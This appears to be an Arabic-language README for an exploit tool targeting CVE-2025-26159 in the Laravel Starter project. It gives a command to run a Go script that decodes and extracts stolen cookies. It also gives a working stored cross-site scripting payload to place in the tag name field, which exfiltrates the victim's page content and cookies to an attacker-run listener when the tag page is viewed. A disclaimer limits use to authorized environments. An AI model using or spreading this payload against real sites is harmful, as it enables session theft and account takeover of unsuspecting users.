
يقوم هذا النص البرمجي بفك التشفير والتصفية واستخراج ملفات تعريف الارتباط كجزء من استغلال ثغرة CVE-2025-26159.
يُستخدم هذا السكريبت فقط في البيئات المصرح بها حيث تم منح الإذن الصريح. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر أو عواقب ناتجة عن استخدام هذا السكريبت.
يقوم هذا السكريبت بفك التشفير والتصفية واستخراج ملفات تعريف الارتباط كجزء من استغلال CVE-2025-26159.
لفهم خطوات الاستغلال، اطّلع على هذا المنشور على مدونتي.
go run CVE-2025-26159.go
في حقل اسم العلامة (tag name) لمشروع Laravel Starter، أضف هذه الحمولة:
<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>
بعد أن يزور المستخدم صفحة تفاصيل العلامة الخبيثة، ستحصل على ملفات تعريف الارتباط الخاصة به.